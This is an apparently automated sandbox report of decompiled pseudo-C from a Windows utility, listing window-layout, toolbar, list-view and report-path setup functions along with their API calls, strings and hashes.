                                                                                                                                                                    				_t273 = _t272 & 0xfffffff8;
                                                                                                                                                                    				E0040E340(0x4298, __ecx);
                                                                                                                                                                    				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
                                                                                                                                                                    				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
                                                                                                                                                                    				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
                                                                                                                                                                    				_a20 = GetWindowLongW(_t234, 0xfffffff0);
                                                                                                                                                                    				_a24 = GetWindowLongW(_a4, 0xfffffff0);
                                                                                                                                                                    				_a96 = GetWindowLongW(_t234, 0xffffffec);
                                                                                                                                                                    				_a36 = GetWindowLongW(_a4, 0xffffffec);
                                                                                                                                                                    				GetWindowRect(_t234,  &_a100);
                                                                                                                                                                    				GetWindowRect(_a4,  &_a60);
                                                                                                                                                                    				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
                                                                                                                                                                    				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
                                                                                                                                                                    				_t237 = _a108 - _a100.x;
                                                                                                                                                                    				_a4 = _a4 & 0x00000000;
                                                                                                                                                                    				_a28 = _a68 - _a60.x;
                                                                                                                                                                    				_a76 = _a112 - _a104;
                                                                                                                                                                    				_a40 = _a72 - _a64;
                                                                                                                                                                    				_t169 = GetDC( *(__esi + 0x10));
                                                                                                                                                                    				_a16 = _t169;
                                                                                                                                                                    				if(_t169 == 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					_v0 = _v0 & 0x00000000;
                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                                    						L12:
                                                                                                                                                                    						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
                                                                                                                                                                    						_a36 = _t171;
                                                                                                                                                                    						GetWindowRect(_t171,  &_a44);
                                                                                                                                                                    						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
                                                                                                                                                                    						GetClientRect( *(_t271 + 0x10),  &_a124);
                                                                                                                                                                    						GetWindowRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                                    						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                                    						GetClientRect( *(_t271 + 0x10),  &_a80);
                                                                                                                                                                    						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                                    					}
                                                                                                                                                                    					_a20 = _a20 | 0x10000000;
                                                                                                                                                                    					_a24 = _a24 | 0x10000000;
                                                                                                                                                                    					_a8 = _a12 + 0x10;
                                                                                                                                                                    					do {
                                                                                                                                                                    						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
                                                                                                                                                                    						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
                                                                                                                                                                    						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_t273 = _t273 + 0x10;
                                                                                                                                                                    						SetWindowTextW(_v56,  &_a72);
                                                                                                                                                                    						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
                                                                                                                                                                    						_v68 = _v68 + 0x14;
                                                                                                                                                                    						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
                                                                                                                                                                    						_v76 = _v76 + 1;
                                                                                                                                                                    					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                                    					goto L12;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t220 = 0;
                                                                                                                                                                    				_a32 = _a32 & 0;
                                                                                                                                                                    				_a8 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
                                                                                                                                                                    					L8:
                                                                                                                                                                    					_t221 = _t220 - _t237;
                                                                                                                                                                    					_a28 = _a28 - _t221;
                                                                                                                                                                    					_a60.x = _a60.x + _t221;
                                                                                                                                                                    					_t237 = _t237 + _t221;
                                                                                                                                                                    					ReleaseDC( *(_t271 + 0x10), _a16);
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v0 = _a12 + 0x10;
                                                                                                                                                                    				do {
                                                                                                                                                                    					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
                                                                                                                                                                    						_t232 = _a100.x + 0xa;
                                                                                                                                                                    						if(_t232 > _v8) {
                                                                                                                                                                    							_v8 = _t232;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_a16 =  &(_a16->i);
                                                                                                                                                                    					_v16 = _v16 + 0x14;
                                                                                                                                                                    				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
                                                                                                                                                                    				_t220 = _v8;
                                                                                                                                                                    				goto L8;
                                                                                                                                                                    			}


























                                                                                                                                                                    0x0040d2a1
                                                                                                                                                                    0x0040d2a5
                                                                                                                                                                    0x0040d2a9
                                                                                                                                                                    0x0040d2ab
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040d2ab
                                                                                                                                                                    0x0040d23b
                                                                                                                                                                    0x0040d23f
                                                                                                                                                                    0x0040d266
                                                                                                                                                                    0x0040d26f
                                                                                                                                                                    0x0040d276
                                                                                                                                                                    0x0040d278
                                                                                                                                                                    0x0040d278
                                                                                                                                                                    0x0040d276
                                                                                                                                                                    0x0040d27c
                                                                                                                                                                    0x0040d287
                                                                                                                                                                    0x0040d28c
                                                                                                                                                                    0x0040d294
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0040D159
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0040D165
                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040D180
                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040D195
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D1A7
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D1B2
                                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040D1C6
                                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040D1D4
                                                                                                                                                                    • GetDC.USER32 ref: 0040D20D
                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D24D
                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
                                                                                                                                                                    • ReleaseDC.USER32 ref: 0040D2AB
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040D36E
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D382
                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0040D3D6
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D3E6
                                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040D3F4
                                                                                                                                                                    • GetClientRect.USER32 ref: 0040D40B
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D415
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
                                                                                                                                                                    • GetClientRect.USER32 ref: 0040D465
                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                    • Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                                    • Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
                                                                                                                                                                    • Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
                                                                                                                                                                    • Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                    			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				struct HMENU__* _t123;
                                                                                                                                                                    				struct HWND__* _t125;
                                                                                                                                                                    				void* _t131;
                                                                                                                                                                    				intOrPtr _t135;
                                                                                                                                                                    				intOrPtr _t139;
                                                                                                                                                                    				void* _t187;
                                                                                                                                                                    				long _t193;
                                                                                                                                                                    				void* _t198;
                                                                                                                                                                    				void* _t200;
                                                                                                                                                                    				void* _t216;
                                                                                                                                                                    				long _t218;
                                                                                                                                                                    				intOrPtr _t220;
                                                                                                                                                                    				intOrPtr _t221;
                                                                                                                                                                    				void* _t222;
                                                                                                                                                                    				int _t225;
                                                                                                                                                                    				void* _t226;
                                                                                                                                                                    				intOrPtr* _t228;
                                                                                                                                                                    				intOrPtr* _t229;
                                                                                                                                                                    				void* _t231;
                                                                                                                                                                    				void* _t232;
                                                                                                                                                                    				intOrPtr* _t233;
                                                                                                                                                                    				long _t241;
                                                                                                                                                                    
                                                                                                                                                                    				_t229 = _t231 - 0x78;
                                                                                                                                                                    				_t232 = _t231 - 0xa4;
                                                                                                                                                                    				 *((char*)(_t229 - 0x23)) = 1;
                                                                                                                                                                    				_t187 = __ecx;
                                                                                                                                                                    				 *(_t229 - 0x2c) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 - 0x24)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 - 0x22)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 - 0x21)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *(_t229 - 0x18) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
                                                                                                                                                                    				 *((char*)(_t229 - 0x10)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 - 0xf)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 - 0xe)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 - 0xd)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *((intOrPtr*)(_t229 - 4)) = 5;
                                                                                                                                                                    				 *_t229 = 0x9c44;
                                                                                                                                                                    				 *((char*)(_t229 + 4)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 + 5)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 6)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 7)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *(_t229 + 0x10) = 2;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
                                                                                                                                                                    				 *((char*)(_t229 + 0x18)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 + 0x19)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x1a)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x1b)) = 0;
                                                                                                                                                                    				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x24)) = 3;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
                                                                                                                                                                    				 *((char*)(_t229 + 0x2c)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 + 0x2d)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x2e)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x2f)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x38)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
                                                                                                                                                                    				 *((char*)(_t229 + 0x40)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 + 0x41)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x42)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x43)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
                                                                                                                                                                    				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
                                                                                                                                                                    				 *((char*)(_t229 + 0x54)) = 4;
                                                                                                                                                                    				 *((char*)(_t229 + 0x55)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x56)) = 0;
                                                                                                                                                                    				 *((char*)(_t229 + 0x57)) = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				_t216 = 0x66;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				_t123 = E00406AFA(_t216);
                                                                                                                                                                    				 *(__ecx + 0x21c) = _t123;
                                                                                                                                                                    				SetMenu( *(__ecx + 0x208), _t123);
                                                                                                                                                                    				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
                                                                                                                                                                    				 *(_t187 + 0x214) = _t125;
                                                                                                                                                                    				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
                                                                                                                                                                    				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
                                                                                                                                                                    				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
                                                                                                                                                                    				_t131 = E00402DE1(__fp0);
                                                                                                                                                                    				 *(_t229 + 0x70) = _t131;
                                                                                                                                                                    				ImageList_Add( *(_t229 + 0x74), _t131, 0);
                                                                                                                                                                    				DeleteObject( *(_t229 + 0x70));
                                                                                                                                                                    				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
                                                                                                                                                                    				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                                    				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
                                                                                                                                                                    				_t218 = 0x50810809;
                                                                                                                                                                    				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
                                                                                                                                                                    					_t218 = 0x50811809;
                                                                                                                                                                    				}
                                                                                                                                                                    				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
                                                                                                                                                                    				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                                    				_t193 =  *(_t139 + 0x2e0);
                                                                                                                                                                    				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
                                                                                                                                                                    				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
                                                                                                                                                                    				if(_t193 <= 0) {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
                                                                                                                                                                    					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
                                                                                                                                                                    					E004099C4(_t221);
                                                                                                                                                                    					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
                                                                                                                                                                    					_t222 = 0x68;
                                                                                                                                                                    					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
                                                                                                                                                                    					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
                                                                                                                                                                    					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
                                                                                                                                                                    					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
                                                                                                                                                                    					_t233 = _t232 + 0xc;
                                                                                                                                                                    					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                    					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
                                                                                                                                                                    					 *( *(_t187 + 0x698)) = 1;
                                                                                                                                                                    					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
                                                                                                                                                                    					_t241 =  *0x4134e0; // 0x0
                                                                                                                                                                    					if(_t241 == 0) {
                                                                                                                                                                    						E00405812(0x4134e0);
                                                                                                                                                                    						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
                                                                                                                                                                    							GetTempPathW(0x104, 0x4134e0);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_t225 = wcslen(0x4134e0);
                                                                                                                                                                    					 *_t233 = L"report.html";
                                                                                                                                                                    					_t105 = wcslen(??) + 1; // 0x1
                                                                                                                                                                    					_t243 = _t225 + _t105 - 0x104;
                                                                                                                                                                    					if(_t225 + _t105 >= 0x104) {
                                                                                                                                                                    						 *((short*)(_t187 + 0x288)) = 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
                                                                                                                                                                    					}
                                                                                                                                                                    					_t198 = 0x30;
                                                                                                                                                                    					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
                                                                                                                                                                    					_t226 = _t187;
                                                                                                                                                                    					E0040A6FF(_t226);
                                                                                                                                                                    					E00405D0F( *(_t187 + 0x214), 0x2000000);
                                                                                                                                                                    					_t200 = 1;
                                                                                                                                                                    					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                                                                                                                                    					E0040A1DC(0, _t200, _t226, _t243);
                                                                                                                                                                    					 *(_t229 + 0x60) = 0x12c;
                                                                                                                                                                    					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
                                                                                                                                                                    					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
                                                                                                                                                                    					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
                                                                                                                                                                    					return E00401BDC(_t226, 0x415);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t228 = _t220 + 0xc;
                                                                                                                                                                    					 *(_t229 + 0x74) = _t193;
                                                                                                                                                                    					do {
                                                                                                                                                                    						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
                                                                                                                                                                    						_t232 = _t232 + 0x10;
                                                                                                                                                                    						_t228 = _t228 + 0x14;
                                                                                                                                                                    						_t81 = _t229 + 0x74;
                                                                                                                                                                    						 *_t81 =  *(_t229 + 0x74) - 1;
                                                                                                                                                                    					} while ( *_t81 != 0);
                                                                                                                                                                    					goto L5;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    0x0040aa70
                                                                                                                                                                    0x0040aa75
                                                                                                                                                                    0x0040aa81
                                                                                                                                                                    0x0040aa83
                                                                                                                                                                    0x0040aa91
                                                                                                                                                                    0x0040aa99
                                                                                                                                                                    0x0040aa99
                                                                                                                                                                    0x0040aa91
                                                                                                                                                                    0x0040aaa5
                                                                                                                                                                    0x0040aaa7
                                                                                                                                                                    0x0040aab3
                                                                                                                                                                    0x0040aab7
                                                                                                                                                                    0x0040aabd
                                                                                                                                                                    0x0040aad8
                                                                                                                                                                    0x0040aabf
                                                                                                                                                                    0x0040aacf
                                                                                                                                                                    0x0040aad5
                                                                                                                                                                    0x0040aae9
                                                                                                                                                                    0x0040aaea
                                                                                                                                                                    0x0040aaef
                                                                                                                                                                    0x0040aaf1
                                                                                                                                                                    0x0040ab01
                                                                                                                                                                    0x0040ab07
                                                                                                                                                                    0x0040ab13
                                                                                                                                                                    0x0040ab1b
                                                                                                                                                                    0x0040ab37
                                                                                                                                                                    0x0040ab3e
                                                                                                                                                                    0x0040ab45
                                                                                                                                                                    0x0040ab58
                                                                                                                                                                    0x0040ab6d
                                                                                                                                                                    0x0040a973
                                                                                                                                                                    0x0040a973
                                                                                                                                                                    0x0040a976
                                                                                                                                                                    0x0040a979
                                                                                                                                                                    0x0040a98a
                                                                                                                                                                    0x0040a98f
                                                                                                                                                                    0x0040a992
                                                                                                                                                                    0x0040a995
                                                                                                                                                                    0x0040a995
                                                                                                                                                                    0x0040a995
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040a979

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02
                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040A84F
                                                                                                                                                                    • CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888
                                                                                                                                                                      • Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                                      • Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                                      • Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                                      • Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                                      • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                                      • Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                                      • Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                                      • Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                                      • Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                                      • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                                      • Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                                    • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA
                                                                                                                                                                      • Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                                      • Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
                                                                                                                                                                      • Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                                      • Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                                      • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                                      • Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                                      • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                                      • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                                      • Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                                      • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                                      • Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                                    • ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040A8E9
                                                                                                                                                                    • SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
                                                                                                                                                                    • CreateWindowExW.USER32 ref: 0040A940
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
                                                                                                                                                                    • LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040AA22
                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 0040AA58
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
                                                                                                                                                                    • wcslen.MSVCRT ref: 0040AAA0
                                                                                                                                                                    • wcslen.MSVCRT ref: 0040AAAE
                                                                                                                                                                    • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
                                                                                                                                                                    • API String ID: 945479791-4224175941
                                                                                                                                                                    • Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                                    • Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                                    				struct tagPOINT _v12;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t47;
                                                                                                                                                                    				struct HBRUSH__* _t56;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				unsigned int _t63;
                                                                                                                                                                    				void* _t68;
                                                                                                                                                                    				struct HWND__* _t69;
                                                                                                                                                                    				struct HWND__* _t70;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    				unsigned int _t74;
                                                                                                                                                                    				struct HWND__* _t76;
                                                                                                                                                                    				struct HWND__* _t77;
                                                                                                                                                                    				struct HWND__* _t78;
                                                                                                                                                                    				struct HWND__* _t79;
                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                    				struct HWND__* _t87;
                                                                                                                                                                    				struct HWND__* _t89;
                                                                                                                                                                    				struct HWND__* _t90;
                                                                                                                                                                    				struct tagPOINT _t96;
                                                                                                                                                                    				struct tagPOINT _t98;
                                                                                                                                                                    				signed short _t103;
                                                                                                                                                                    				void* _t106;
                                                                                                                                                                    				void* _t117;
                                                                                                                                                                    
                                                                                                                                                                    				_t106 = __edx;
                                                                                                                                                                    				_push(__ecx);
